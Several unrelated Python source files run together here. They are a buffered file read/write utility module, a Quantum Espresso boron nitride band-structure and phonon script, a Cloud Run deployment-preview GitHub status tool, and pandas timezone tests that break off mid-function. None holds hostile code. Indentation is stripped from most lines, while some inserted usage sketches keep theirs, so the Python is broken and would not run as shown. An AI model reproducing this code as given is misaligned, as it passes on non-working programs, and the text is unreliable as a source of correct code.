# http://www.apache.org/licenses/LICENSE-2.0
# or
# in the file named LICENSE in the root directory of this project.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' File related utilities.
'''
import os
def getLastLine(f, blockSize=3072):
"""Return the last line of a file
If the last line is an empty string, the second to last line is returned.
"""
f.seek(0,os.SEEK_END)
totalBytes = f.tell()
if totalBytes > blockSize:
f.seek(-blockSize,os.SEEK_END)
else:
f.seek(0)
lastLines = f.readlines()
lastLine = lastLines[-1]
    if lastLine == '':
lastLine = lastLines[-2]
return lastLine
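# Illustrative usage sketch (not part of the original module); the file name
# is hypothetical:
def exampleGetLastLine(path='example.log'):
    """ Open a file in binary mode and return its last line """
    f = open(path, 'rb')
    try:
        return getLastLine(f)
    finally:
        f.close()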
def multipleFileReadLines(filePaths):
""" Generator for concurrent lines in files from a list of full file paths
A fileBuffer is loaded for each file, opening and then closing a single file at a time.
The position in the file is recorded with each fileBuffer extraction,
so the next opening of the file will extract lines from the proper position.
All files are assumed to have the same number of records, but line length need not be the same
"""
buffers = []
filePositions = []
for filePath in filePaths:
        lines, filePosition = readMultipleFileLinesAndPositions(filePath)
buffers.append(lines)
filePositions.append(filePosition)
linesRemaining = True
while linesRemaining:
currentLines = []
for i,fileBuffer in enumerate(buffers):
currentLines.append(fileBuffer[0].strip())
del fileBuffer[0]
            if not fileBuffer and linesRemaining:
lines, filePosition = readMultipleFileLinesAndPositions(filePaths[i],filePositions[i])
buffers[i] = lines
filePositions[i] = filePosition
linesRemaining = bool(lines)
yield currentLines
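# Illustrative usage sketch (not part of the original module); the file names
# are hypothetical:
def exampleLockstepRead():
    """ Print corresponding lines from two files side by side """
    for nameLine, valueLine in multipleFileReadLines(['names.txt', 'values.txt']):
        print('%s\t%s' % (nameLine, valueLine))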
def readMultipleFileLinesAndPositions(filePath,startPosition=None, bytesToRead=1):
""" Extracts lines from file, starting at the specified startPosition.
The file-object's readlines() method is used to extract lines,
and the tell() method is used to return the position of the next line in the file.
    The bytesToRead value is passed as the hint argument to readlines(). The default bytesToRead value is set to 1
    so that readlines() uses its own default buffer size (somewhere near 8359 bytes)
"""
f = open(filePath, 'rb')
    if startPosition is not None:
f.seek(startPosition)
lines = f.readlines(bytesToRead)
position = f.tell()
f.close()
return lines, position
class multipleFileWriterWithBuffer():
""" Write lines to multiple files efficiently.
Maintains a buffer for each file.
Writes to disk when length of all strings in buffer exceeds strLen parameter.
Creating new strings is inefficient, so buffer is stored as list of strings.
"""
    def __init__(self, filePaths=None, outDir=None, initialDelete=True, strLen=8092):
""" Initializer """
# Class level variables
self.strLen = strLen
self.filePathDict = {}
self.outDir = outDir
if filePaths:
self.addFiles(filePaths)
# Delete files by default, unless default overridden
if initialDelete:
self.deleteAllFiles(False)
def __del__(self):
""" Destructor
Buffer is flushed when object is destroyed
"""
self.flush()
def __writeToFile(self, filePath, lst):
""" Write lines to file
        Lines are written as-is; no delimiter is added.
"""
        if self.outDir is not None:
            filePath = os.path.join(self.outDir, filePath)
        with open(filePath, 'a') as f:
            f.writelines(lst)
def writeMultipleFileLines(self, filePaths, liness):
""" Write lines to multiple files
liness: list of lists, one for each filePath
Buffer is written to file when buffer exceeds strLen
Line separators are not added.
"""
for i,filePath in enumerate(filePaths):
self.writeSingleFileLines(filePath,liness[i])
def writeSingleFileLines(self, filePath, lines):
""" Add lines in iterable to buffer
Buffer is written to file when buffer exceeds strLen
Line separators are not added
"""
lenAndBuffer = self.filePathDict[filePath]
for line in lines:
lenAndBuffer[1].append(line)
lenAndBuffer[0] = lenAndBuffer[0] + len(line)
if lenAndBuffer[0] > self.strLen:
self.__writeToFile(filePath,lenAndBuffer[1])
lenAndBuffer[0] = 0 # set bytes to zero
lenAndBuffer[1] = []
def writeMultipleFiles(self, filePaths, ss):
""" Write strings to multiple files """
for i,filePath in enumerate(filePaths):
self.writeSingleFileLines(filePath, [ss[i]])
def writeSingleFile(self, filePath, s):
"""" Write string to file. """
self.writeSingleFileLines(filePath, [s])
def flush(self, write=True):
""" Flush all buffers, writing to files if write parameter is True"""
for filePath, (_strLen,fileBuffer) in self.filePathDict.items():
if write:
self.__writeToFile(filePath, fileBuffer)
del fileBuffer[:]
def deleteAllFiles(self, flush=True):
""" Delete all files
Flush buffers if flush parameter is true, the default.
"""
if flush:
self.flush(False)
for filePath in self.filePathDict.keys():
if self.outDir is None:
fullPath = filePath
else:
fullPath = os.path.join(self.outDir,filePath)
if os.path.exists(fullPath):
os.remove(fullPath)
def addFile(self, filePath):
""" Add file as file Path
Files are stored in a dictionary with filePath as key
and a list containing [string length integer, list of lines] as the value.
"""
self.filePathDict[filePath] = [0,[]]
def addFiles(self, filePaths):
""" Add files as iterable of full file paths """
for filePath in filePaths:
self.addFile(filePath)
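# Illustrative usage sketch (not part of the original module); the paths and
# line contents are hypothetical:
def exampleBufferedWrite():
    """ Buffer lines for two files, then flush the buffers to disk """
    writer = multipleFileWriterWithBuffer(['a.txt', 'b.txt'])
    writer.writeMultipleFileLines(['a.txt', 'b.txt'],
                                  [['line 1 for a\n'], ['line 1 for b\n']])
    writer.flush()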
|
|
#
# Author: Henrique Pereira Coutada Miranda
# Run a boron nitride groundstate calculation using Quantum Espresso
#
from __future__ import print_function, division
import sys
import argparse
from qepy import *
from schedulerpy import *
from math import sqrt
kpoints = [6,6,1]
kpoints_nscf = [6,6,1]
kpoints_double = [24,24,1]
qpoints = [3,3,1]
layer_separation = 12
pw = 'pw.x'
ph = 'ph.x'
q2r = 'q2r.x'
matdyn = 'matdyn.x'
prefix = 'bn'
npoints = 10
p = Path([ [[0.0, 0.0, 0.0],'$\Gamma$'],
[[0.5, 0.0, 0.0],'M'],
[[1./3,1./3,0.0],'K'],
[[0.0, 0.0, 0.0],'$\Gamma$']], [int(npoints*2),int(npoints),int(sqrt(5)*npoints)])
# scheduler
scheduler = Scheduler.factory
# create the input files
def get_inputfile():
""" Define a Quantum espresso input file for boron nitride
"""
qe = PwIn()
qe.set_atoms([['N',[0.0,0.0,0.5]],
['B',[1/3,2/3,0.5]]])
qe.atypes = {'B': [10.811, "B.pbe-mt_fhi.UPF"],
'N': [14.0067,"N.pbe-mt_fhi.UPF"]}
qe.control['prefix'] = "'%s'"%prefix
qe.control['verbosity'] = "'high'"
qe.control['wf_collect'] = '.true.'
qe.control['pseudo_dir'] = "'../pseudos/'"
qe.system['celldm(1)'] = 4.7
qe.system['celldm(3)'] = layer_separation/qe.system['celldm(1)']
qe.system['ecutwfc'] = 60
qe.system['occupations'] = "'fixed'"
qe.system['nat'] = 2
qe.system['ntyp'] = 2
qe.system['ibrav'] = 4
qe.kpoints = [9, 9, 1]
qe.electrons['conv_thr'] = 1e-10
return qe
#relax
def relax():
if not os.path.isdir('relax'):
os.mkdir('relax')
qe = get_inputfile()
qe.control['calculation'] = "'vc-relax'"
qe.ions['ion_dynamics'] = "'bfgs'"
qe.cell['cell_dynamics'] = "'bfgs'"
qe.cell['cell_dofree'] = "'2Dxy'"
qe.write('relax/%s.relax'%prefix)
#scf
def scf(kpoints,folder='scf'):
if not os.path.isdir(folder):
os.mkdir(folder)
qe = get_inputfile()
qe.control['calculation'] = "'scf'"
qe.kpoints = kpoints
qe.write('%s/%s.scf'%(folder,prefix))
#nscf
def nscf(kpoints,folder='nscf'):
if not os.path.isdir(folder):
os.mkdir(folder)
qe = get_inputfile()
qe.control['calculation'] = "'nscf'"
qe.electrons['diago_full_acc'] = ".true."
qe.electrons['conv_thr'] = 1e-8
qe.system['nbnd'] = 70
qe.system['force_symmorphic'] = ".true."
qe.kpoints = kpoints
qe.write('%s/%s.nscf'%(folder,prefix))
#bands
def bands():
if not os.path.isdir('bands'):
os.mkdir('bands')
qe = get_inputfile()
qe.control['calculation'] = "'bands'"
qe.electrons['diago_full_acc'] = ".true."
qe.electrons['conv_thr'] = 1e-6
qe.system['nbnd'] = 6
qe.system['force_symmorphic'] = ".true."
qe.ktype = 'crystal'
qe.set_path(p)
qe.write('bands/%s.bands'%prefix)
def phonon(kpoints,qpoints,folder='phonon'):
if not os.path.isdir(folder):
os.mkdir(folder)
ph = PhIn()
ph['nq1'],ph['nq2'],ph['nq3'] = qpoints
ph['tr2_ph'] = 1e-8
ph['prefix'] = "'%s'"%prefix
ph['epsil'] = ".false."
ph['trans'] = ".true."
ph['fildyn'] = "'%s.dyn'"%prefix
ph['fildrho'] = "'%s.drho'"%prefix
ph['ldisp'] = ".true."
ph.write('%s/%s.ph'%(folder,prefix))
md = DynmatIn()
md['asr'] = "'simple'"
md['fildyn'] = "'%s.dyn1'"%prefix
md['filout'] = "'%s.modes'"%prefix
md.write('%s/%s.dynmat'%(folder,prefix))
def update_positions(pathin,pathout):
""" update the positions of the atoms in the scf file using the output of the relaxation loop
"""
# Read scaled positions
e = PwXML(prefix,path=pathin)
pos = e.get_scaled_positions()
#open relax input
qin = PwIn.from_file('%s/%s.relax'%(pathin,prefix))
print("old celldm(1)", qin.system['celldm(1)'])
#open scf input
qout = PwIn.from_file('%s/%s.scf'%(pathout,prefix))
#replace lattice parameter
qout.system['celldm(1)'] = e.cell[0][0]
print("new celldm(1)", qout.system['celldm(1)'])
#replace atomic positions
new_atomic_pos = [[qout.atoms[i][0],list(pos[i])] for i in range(len(qout.atoms))]
qout.set_atoms(new_atomic_pos)
#re-write scf input
qout.write('%s/%s.scf'%(pathout,prefix))
def run_plot():
print("running plotting:")
xml = PwXML(prefix=prefix,path='bands')
xml.plot_eigen(p)
def run_projection(show=True):
import matplotlib.pyplot as plt
#write input file
projwfc = ProjwfcIn('bn')
projwfc.write(folder='bands')
projwfc.run(folder='bands')
#read xml file
projection = ProjwfcXML(prefix='bn',path='bands')
n_atom = range(16)
b_atom = range(16,32)
ax = plt.subplot(1,1,1)
cax = projection.plot_eigen(ax,path=p,selected_orbitals=b_atom,selected_orbitals_2=n_atom,size=40,cmap='seismic')
plt.colorbar(cax)
if show: plt.show()
def run_bands(nthreads=1):
print("running bands:")
qe_run = scheduler()
qe_run.add_command("cp -r scf/%s.save bands/"%prefix)
qe_run.add_command("cd bands; mpirun -np %d %s -inp %s.bands -nk %d > bands.log"%(nthreads,pw,prefix,nthreads))
qe_run.run()
qe_run.clean()
print("done!")
if __name__ == "__main__":
#parse options
parser = argparse.ArgumentParser(description='Test the yambopy script.')
parser.add_argument('-r' ,'--relax', action="store_true", help='Structural relaxation')
parser.add_argument('-s' ,'--scf', action="store_true", help='Self-consistent calculation')
parser.add_argument('-n' ,'--nscf', action="store_true", help='Non-self consistent calculation')
parser.add_argument('-n2','--nscf_double', action="store_true", help='Non-self consistent calculation for the double grid')
parser.add_argument('-b' ,'--bands', action="store_true", help='Calculate band-structure')
parser.add_argument('-l' ,'--plot', action="store_true", help='Plot band-structure')
parser.add_argument('-o' ,'--orbitals', action="store_true", help='Plot atomic orbital projected band-structure')
parser.add_argument('-p' ,'--phonon', action="store_true", help='Phonon calculation')
parser.add_argument('-d' ,'--dispersion', action="store_true", help='Phonon dispersion')
parser.add_argument('-t' ,'--nthreads', help='Number of threads', default=2 )
args = parser.parse_args()
nthreads = int(args.nthreads)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
# create input files and folders
relax()
scf(kpoints,folder='scf')
nscf(kpoints_nscf)
nscf(kpoints_double, folder='nscf_double')
bands()
phonon(kpoints,qpoints)
if args.relax:
print("running relax:")
qe_run = scheduler()
qe_run.add_command("cd relax; mpirun -np %d %s -inp %s.relax > relax.log"%(nthreads,pw,prefix)) #relax
qe_run.run()
update_positions('relax','scf')
print("done!")
if args.scf:
print("running scf:")
qe_run = scheduler()
qe_run.add_command("cd scf; mpirun -np %d %s -inp %s.scf > scf.log"%(nthreads,pw,prefix)) #scf
qe_run.run()
print("done!")
if args.nscf:
print("running nscf:")
qe_run = scheduler()
qe_run.add_command("cp -r scf/%s.save nscf/"%prefix) #nscf
qe_run.add_command("cd nscf; mpirun -np %d %s -nk %d -inp %s.nscf > nscf.log"%(nthreads,pw,nthreads,prefix)) #nscf
qe_run.run()
print("done!")
if args.nscf_double:
print("running nscf_double:")
qe_run = scheduler()
qe_run.add_command("cp -r scf/%s.save nscf_double/"%prefix) #nscf
qe_run.add_command("cd nscf_double; mpirun -np %d %s -inp %s.nscf > nscf_double.log"%(nthreads,pw,prefix)) #nscf
qe_run.run()
print("done!")
if args.phonon:
print("running phonon:")
qe_run = scheduler()
qe_run.add_command("cp -r scf/%s.save phonon/"%prefix)
qe_run.add_command("cd phonon; mpirun -np %d %s -inp %s.ph > phonon.log"%(nthreads,ph,prefix)) #phonon
qe_run.add_command("dynmat.x < %s.dynmat > dynmat.log"%prefix) #matdyn
qe_run.run()
print("done!")
if args.dispersion:
qe_run = scheduler()
#q2r
disp = DynmatIn()
disp['fildyn']= "'%s.dyn'" % prefix
disp['zasr'] = "'simple'"
disp['flfrc'] = "'%s.fc'" % prefix
disp.write('phonon/q2r.in')
qe_run.add_command('cd phonon; %s < q2r.in'%q2r)
#dynmat
dyn = DynmatIn()
dyn['flfrc'] = "'%s.fc'" % prefix
dyn['asr'] = "'simple'"
dyn['flfrq'] = "'%s.freq'" % prefix
dyn['q_in_cryst_coord'] = '.true.'
dyn.qpoints = p.get_klist()
dyn.write('phonon/matdyn.in')
qe_run.add_command('%s < matdyn.in'%matdyn)
qe_run.run()
# matdyn class to read and plot the frequencies
m = Matdyn.from_modes_file(folder='phonon')
m.plot_eigen(path=p)
if args.bands:
run_bands(nthreads)
run_plot()
if args.orbitals:
run_projection()
if args.plot:
run_plot()
|
|
#!/usr/bin/python
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
from typing import Callable, List
import click
import github
from github.GithubException import GithubException
from googleapiclient import discovery
from googleapiclient.errors import HttpError
# cloud run tags must be lowercase
TAG_PREFIX = "pr-"
def make_tag(pr: str) -> str:
return f"{TAG_PREFIX}{pr}"
def get_pr(tag: str) -> int:
return int(tag.replace(TAG_PREFIX, ""))
_default_options = [
click.option(
"--dry-run",
help="Dry-run mode. No tag changes made",
default=False,
is_flag=True,
),
]
_cloudrun_options = [
click.option("--project-id", required=True, help="Google Cloud Project ID"),
click.option(
"--region", required=True, help="Google Cloud Region", default="us-central1"
),
click.option("--service", required=True, help="Google Cloud Run service name"),
]
_github_options = [
click.option(
"--repo-name", required=True, help="GitHub repo name (user/repo, or org/repo)"
)
]
def add_options(options: List[Callable]) -> Callable:
def _add_options(func: Callable) -> Callable:
for option in reversed(options):
func = option(func)
return func
return _add_options
def error(msg: str, context: str = None) -> None:
click.secho(f"Error {context}: ", fg="red", bold=True, nl=False)
click.echo(msg)
sys.exit(1)
def get_service(project_id: str, region: str, service_name: str) -> dict:
"""Get the Cloud Run service object"""
api = discovery.build("run", "v1")
fqname = f"projects/{project_id}/locations/{region}/services/{service_name}"
try:
service = api.projects().locations().services().get(name=fqname).execute()
except HttpError as e:
error(re.search('"(.*)"', str(e)).group(0), context="finding service")
return service
def update_service(project_id: str, region: str, service_name: str, body: dict) -> dict:
"""Update the Cloud Run service."""
api = discovery.build("run", "v1")
fqname = f"projects/{project_id}/locations/{region}/services/{service_name}"
try:
result = (
api.projects()
.locations()
.services()
.replaceService(name=fqname, body=body)
.execute()
)
except HttpError as e:
error(re.search('"(.*)"', str(e)).group(0), context="updating service")
return result
def get_revision_url(service_obj: dict, tag: str) -> str:
"""Get the revision URL for the tag specified on the service"""
for revision in service_obj["status"]["traffic"]:
if revision.get("tag", None) == tag:
return revision["url"]
error(
f"Tag on service {service_obj['metadata']['name']} does not exist.",
context=f"finding revision tagged {tag}",
)
def get_revision_tags(service: dict) -> List[dict]:
    """Get all tagged traffic entries associated with a service"""
revs = []
for revision in service["status"]["traffic"]:
if revision.get("tag", None):
revs.append(revision)
return revs
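# Illustrative sketch (not part of the original tool): a tagged entry in
# service["status"]["traffic"], as inspected by the helpers above, looks
# roughly like this; the values are hypothetical.
_EXAMPLE_TRAFFIC_ENTRY = {
    "revisionName": "my-service-00042-abc",
    "tag": make_tag("17"),  # -> "pr-17"
    "url": "https://pr-17---my-service-abcdef-uc.a.run.app",
}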
@click.group()
def cli() -> None:
"""Tool for setting GitHub Status Checks to Cloud Run Revision URLs"""
pass
@cli.command()
@add_options(_default_options)
@add_options(_cloudrun_options)
@add_options(_github_options)
def cleanup(
    dry_run: bool, project_id: str, region: str, service: str, repo_name: str
) -> None:
"""Cleanup any revision URLs against closed pull requests"""
service_obj = get_service(project_id, region, service)
revs = get_revision_tags(service_obj)
if not revs:
click.echo("No revision tags found, nothing to clean up")
sys.exit(0)
ghtoken = os.environ.get("GITHUB_TOKEN", None)
if not ghtoken:
raise ValueError("GITHUB_TOKEN not defined.")
try:
repo = github.Github(ghtoken).get_repo(repo_name)
except GithubException as e:
error(e.data["message"], context=f"finding repo {repo_name}")
tags_to_delete = []
for rev in revs:
tag = rev["tag"]
pr = get_pr(tag)
pull_request = repo.get_pull(pr)
if pull_request.state == "closed":
if dry_run:
click.secho("Dry-run: ", fg="blue", bold=True, nl=False)
click.echo(
f"PR {pr} is closed, so would remove tag {tag} on service {service}"
)
else:
tags_to_delete.append(tag)
if tags_to_delete:
# Edit the service by removing the tags from the traffic spec, then replace the service
# with this new configuration.
for tag in tags_to_delete:
for traffic in service_obj["spec"]["traffic"]:
if "tag" in traffic.keys() and tag == traffic["tag"]:
service_obj["spec"]["traffic"].remove(traffic)
click.echo(f"Updating the service to remove tags: {','.join(tags_to_delete)}.")
update_service(project_id, region, service, service_obj)
else:
click.echo("Did not identify any tags to delete.")
@cli.command()
@add_options(_default_options)
@add_options(_cloudrun_options)
@add_options(_github_options)
@click.option("--pull-request", required=True, help="GitHub Pull Request ID", type=int)
@click.option("--commit-sha", required=True, help="GitHub commit (SHORT_SHA)")
# [START cloudrun_deployment_preview_setstatus]
def set(
    dry_run: bool,
    project_id: str,
    region: str,
    service: str,
    repo_name: str,
    commit_sha: str,
    pull_request: int,
) -> None:
"""Set a status on a GitHub commit to a specific revision URL"""
service_obj = get_service(project_id, region, service)
revision_url = get_revision_url(service_obj, tag=make_tag(pull_request))
ghtoken = os.environ.get("GITHUB_TOKEN", None)
if not ghtoken:
raise ValueError("GITHUB_TOKEN not defined.")
try:
repo = github.Github(ghtoken).get_repo(repo_name)
except GithubException as e:
error(
e.data["message"],
context=f"finding repo {repo_name}. Is it a private repo, and does your token have the correct permissions?",
)
try:
commit = repo.get_commit(sha=commit_sha)
except GithubException as e:
error(e.data["message"], context=f"finding commit {commit_sha}")
# [START_EXCLUDE]
if dry_run:
click.secho("Dry-run: ", fg="blue", bold=True, nl=False)
click.echo(
(
f"Status would have been created on {repo_name}, "
f"commit {commit.sha[:7]}, linking to {revision_url} "
f"on service {service_obj['metadata']['name']}"
)
)
return
# [END_EXCLUDE]
commit.create_status(
state="success",
target_url=revision_url,
context="Deployment Preview",
description="Your preview is now available.",
)
click.secho("Success: ", fg="green", bold=True, nl=False)
click.echo(
f"Status created on {repo_name}, commit {commit.sha[:7]}, "
f"linking to {revision_url} on service {service_obj['metadata']['name']}"
)
# [END cloudrun_deployment_preview_setstatus]
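# Illustrative invocation sketch (script name and values are hypothetical):
#
#   GITHUB_TOKEN=... python deployment_previews.py set \
#       --project-id my-project --region us-central1 --service my-service \
#       --repo-name my-org/my-repo --pull-request 17 --commit-sha abc1234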
if __name__ == "__main__":
cli()
|
|
"""
Tests for Timestamp timezone-related methods
"""
from datetime import (
date,
datetime,
timedelta,
)
import dateutil
from dateutil.tz import (
gettz,
tzoffset,
)
import pytest
import pytz
from pytz.exceptions import (
AmbiguousTimeError,
NonExistentTimeError,
)
from pandas._libs.tslibs import timezones
from pandas.errors import OutOfBoundsDatetime
import pandas.util._test_decorators as td
from pandas import (
NaT,
Timestamp,
)
class TestTimestampTZOperations:
# --------------------------------------------------------------
# Timestamp.tz_localize
def test_tz_localize_pushes_out_of_bounds(self):
# GH#12677
# tz_localize that pushes away from the boundary is OK
msg = (
f"Converting {Timestamp.min.strftime('%Y-%m-%d %H:%M:%S')} "
f"underflows past {Timestamp.min}"
)
pac = Timestamp.min.tz_localize("US/Pacific")
assert pac.value > Timestamp.min.value
pac.tz_convert("Asia/Tokyo") # tz_convert doesn't change value
with pytest.raises(OutOfBoundsDatetime, match=msg):
Timestamp.min.tz_localize("Asia/Tokyo")
# tz_localize that pushes away from the boundary is OK
msg = (
f"Converting {Timestamp.max.strftime('%Y-%m-%d %H:%M:%S')} "
f"overflows past {Timestamp.max}"
)
tokyo = Timestamp.max.tz_localize("Asia/Tokyo")
assert tokyo.value < Timestamp.max.value
tokyo.tz_convert("US/Pacific") # tz_convert doesn't change value
with pytest.raises(OutOfBoundsDatetime, match=msg):
Timestamp.max.tz_localize("US/Pacific")
def test_tz_localize_ambiguous_bool(self):
# make sure that we are correctly accepting bool values as ambiguous
# GH#14402
ts = Timestamp("2015-11-01 01:00:03")
expected0 = Timestamp("2015-11-01 01:00:03-0500", tz="US/Central")
expected1 = Timestamp("2015-11-01 01:00:03-0600", tz="US/Central")
msg = "Cannot infer dst time from 2015-11-01 01:00:03"
with pytest.raises(pytz.AmbiguousTimeError, match=msg):
ts.tz_localize("US/Central")
result = ts.tz_localize("US/Central", ambiguous=True)
assert result == expected0
result = ts.tz_localize("US/Central", ambiguous=False)
assert result == expected1
def test_tz_localize_ambiguous(self):
ts = Timestamp("2014-11-02 01:00")
ts_dst = ts.tz_localize("US/Eastern", ambiguous=True)
ts_no_dst = ts.tz_localize("US/Eastern", ambiguous=False)
assert (ts_no_dst.value - ts_dst.value) / 1e9 == 3600
msg = "Cannot infer offset with only one time"
with pytest.raises(ValueError, match=msg):
ts.tz_localize("US/Eastern", ambiguous="infer")
# GH#8025
msg = "Cannot localize tz-aware Timestamp, use tz_convert for conversions"
with pytest.raises(TypeError, match=msg):
Timestamp("2011-01-01", tz="US/Eastern").tz_localize("Asia/Tokyo")
msg = "Cannot convert tz-naive Timestamp, use tz_localize to localize"
with pytest.raises(TypeError, match=msg):
Timestamp("2011-01-01").tz_convert("Asia/Tokyo")
@pytest.mark.parametrize(
"stamp, tz",
[
("2015-03-08 02:00", "US/Eastern"),
("2015-03-08 02:30", "US/Pacific"),
("2015-03-29 02:00", "Europe/Paris"),
("2015-03-29 02:30", "Europe/Belgrade"),
],
)
def test_tz_localize_nonexistent(self, stamp, tz):
# GH#13057
ts = Timestamp(stamp)
with pytest.raises(NonExistentTimeError, match=stamp):
ts.tz_localize(tz)
# GH 22644
with pytest.raises(NonExistentTimeError, match=stamp):
ts.tz_localize(tz, nonexistent="raise")
assert ts.tz_localize(tz, nonexistent="NaT") is NaT
def test_tz_localize_ambiguous_raise(self):
# GH#13057
ts = Timestamp("2015-11-1 01:00")
msg = "Cannot infer dst time from 2015-11-01 01:00:00,"
with pytest.raises(AmbiguousTimeError, match=msg):
ts.tz_localize("US/Pacific", ambiguous="raise")
def test_tz_localize_nonexistent_invalid_arg(self):
# GH 22644
tz = "Europe/Warsaw"
ts = Timestamp("2015-03-29 02:00:00")
msg = (
"The nonexistent argument must be one of 'raise', 'NaT', "
"'shift_forward', 'shift_backward' or a timedelta object"
)
with pytest.raises(ValueError, match=msg):
ts.tz_localize(tz, nonexistent="foo")
@pytest.mark.parametrize(
"stamp",
[
"2014-02-01 09:00",
"2014-07-08 09:00",
"2014-11-01 17:00",
"2014-11-05 00:00",
],
)
def test_tz_localize_roundtrip(self, stamp, tz_aware_fixture):
tz = tz_aware_fixture
ts = Timestamp(stamp)
localized = ts.tz_localize(tz)
assert localized == Timestamp(stamp, tz=tz)
msg = "Cannot localize tz-aware Timestamp"
with pytest.raises(TypeError, match=msg):
localized.tz_localize(tz)
reset = localized.tz_localize(None)
assert reset == ts
assert reset.tzinfo is None
def test_tz_localize_ambiguous_compat(self):
        # validate that pytz and dateutil are compatible for dst
        # when the transition happens
naive = Timestamp("2013-10-27 01:00:00")
pytz_zone = "Europe/London"
dateutil_zone = "dateutil/Europe/London"
result_pytz = naive.tz_localize(pytz_zone, ambiguous=0)
result_dateutil = naive.tz_localize(dateutil_zone, ambiguous=0)
assert result_pytz.value == result_dateutil.value
assert result_pytz.value == 1382835600000000000
# fixed ambiguous behavior
# see gh-14621, GH#45087
assert result_pytz.to_pydatetime().tzname() == "GMT"
assert result_dateutil.to_pydatetime().tzname() == "GMT"
assert str(result_pytz) == str(result_dateutil)
# 1 hour difference
result_pytz = naive.tz_localize(pytz_zone, ambiguous=1)
result_dateutil = naive.tz_localize(dateutil_zone, ambiguous=1)
assert result_pytz.value == result_dateutil.value
assert result_pytz.value == 1382832000000000000
# see gh-14621
assert str(result_pytz) == str(result_dateutil)
assert (
result_pytz.to_pydatetime().tzname()
== result_dateutil.to_pydatetime().tzname()
)
@pytest.mark.parametrize(
"tz",
[
pytz.timezone("US/Eastern"),
gettz("US/Eastern"),
"US/Eastern",
"dateutil/US/Eastern",
],
)
def test_timestamp_tz_localize(self, tz):
stamp = Timestamp("3/11/2012 04:00")
result = stamp.tz_localize(tz)
expected = Timestamp("3/11/2012 04:00", tz=tz)
assert result.hour == expected.hour
assert result == expected
@pytest.mark.parametrize(
"start_ts, tz, end_ts, shift",
[
["2015-03-29 02:20:00", "Europe/Warsaw", "2015-03-29 03:00:00", "forward"],
[
"2015-03-29 02:20:00",
"Europe/Warsaw",
"2015-03-29 01:59:59.999999999",
"backward",
],
[
"2015-03-29 02:20:00",
"Europe/Warsaw",
"2015-03-29 03:20:00",
timedelta(hours=1),
],
[
"2015-03-29 02:20:00",
"Europe/Warsaw",
"2015-03-29 01:20:00",
timedelta(hours=-1),
],
["2018-03-11 02:33:00", "US/Pacific", "2018-03-11 03:00:00", "forward"],
[
"2018-03-11 02:33:00",
"US/Pacific",
"2018-03-11 01:59:59.999999999",
"backward",
],
[
"2018-03-11 02:33:00",
"US/Pacific",
"2018-03-11 03:33:00",
timedelta(hours=1),
],
[
"2018-03-11 02:33:00",
"US/Pacific",
"2018-03-11 01:33:00",
timedelta(hours=-1),
],
],
)
@pytest.mark.parametrize("tz_type", ["", "dateutil/"])
def test_timestamp_tz_localize_nonexistent_shift(
self, start_ts, tz, end_ts, shift, tz_type
):
# GH 8917, 24466
tz = tz_type + tz
if isinstance(shift, str):
shift = "shift_" + shift
ts = Timestamp(start_ts)
result = ts.tz_localize(tz, nonexistent=shift)
expected = Timestamp(end_ts).tz_localize(tz)
assert result == expected
@pytest.mark.parametrize("offset", [-1, 1])
@pytest.mark.parametrize("tz_type", ["", "dateutil/"])
def test_timestamp_tz_localize_nonexistent_shift_invalid(self, offset, tz_type):
# GH 8917, 24466
tz = tz_type + "Europe/Warsaw"
ts = Timestamp("2015-03-29 02:20:00")
msg = "The provided timedelta will relocalize on a nonexistent time"
with pytest.raises(ValueError, match=msg):
ts.tz_localize(tz, nonexistent=timedelta(seconds=offset))
@pytest.mark.parametrize("tz", ["Europe/Warsaw", "dateutil/Europe/Warsaw"])
def test_timestamp_tz_localize_nonexistent_NaT(self, tz):
# GH 8917
ts = Timestamp("2015-03-29 02:20:00")
result = ts.tz_localize(tz, nonexistent="NaT")
assert result is NaT
@pytest.mark.parametrize("tz", ["Europe/Warsaw", "dateutil/Europe/Warsaw"])
def test_timestamp_tz_localize_nonexistent_raise(self, tz):
# GH 8917
ts = Timestamp("2015-03-29 02:20:00")
msg = "2015-03-29 02:20:00"
with pytest.raises(pytz.NonExistentTimeError, match=msg):
ts.tz_localize(tz, nonexistent="raise")
msg = (
"The nonexistent argument must be one of 'raise', 'NaT', "
"'shift_forward', 'shift_backward' or a timedelta object"
)
with pytest.raises(ValueError, match=msg):
ts.tz_localize(tz, nonexistent="foo")
# ------------------------------------------------------------------
# Timestamp.tz_convert
@pytest.mark.parametrize(
"stamp",
[
"2014-02-01 09:00",
"2014-07-08 09:00",
"2014-11-01 17:00",
"2014-11-05 00:00",
],
)
def test_tz_convert_roundtrip(self, stamp, tz_aware_fixture):
tz = tz_aware_fixture
ts = Timestamp(stamp, tz="UTC")
converted = ts.tz_convert(tz)
reset = converted.tz_convert(None)
assert reset == Timestamp(stamp)
assert reset.tzinfo is None
assert reset == converted.tz_convert("UTC").tz_localize(None)
@pytest.mark.parametrize("tzstr", ["US/Eastern", "dateutil/US/Eastern"])
def test_astimezone(self, tzstr):
# astimezone is an alias for tz_convert, so keep it with
# the tz_convert tests
utcdate = Timestamp("3/11/2012 22:00", tz="UTC")
expected = utcdate.tz_convert(tzstr)
result = utcdate.astimezone(tzstr)
assert expected == result
assert isinstance(result, Timestamp)
@td.skip_if_windows
def test_tz_convert_utc_with_system_utc(self):
# from system utc to real utc
ts = Timestamp("2001-01-05 11:56", tz=timezones.maybe_get_tz("dateutil/UTC"))
# check that the time hasn't changed.
assert ts == ts.tz_convert(dateutil.tz.tzutc())
# ------------------------------------------------------------------
# Timestamp.__init__ with tz str or tzinfo
def test_timestamp_constructor_tz_utc(self):
utc_stamp = Timestamp("3/11/2012 05:00", tz="utc")
assert utc_stamp.tzinfo is pytz.utc
assert utc_stamp.hour == 5
utc_stamp = Timestamp("3/11/2012 05:00").tz_localize("utc")
assert utc_stamp.hour == 5
def test_timestamp_to_datetime_tzoffset(self):
tzinfo = tzoffset(None, 7200)
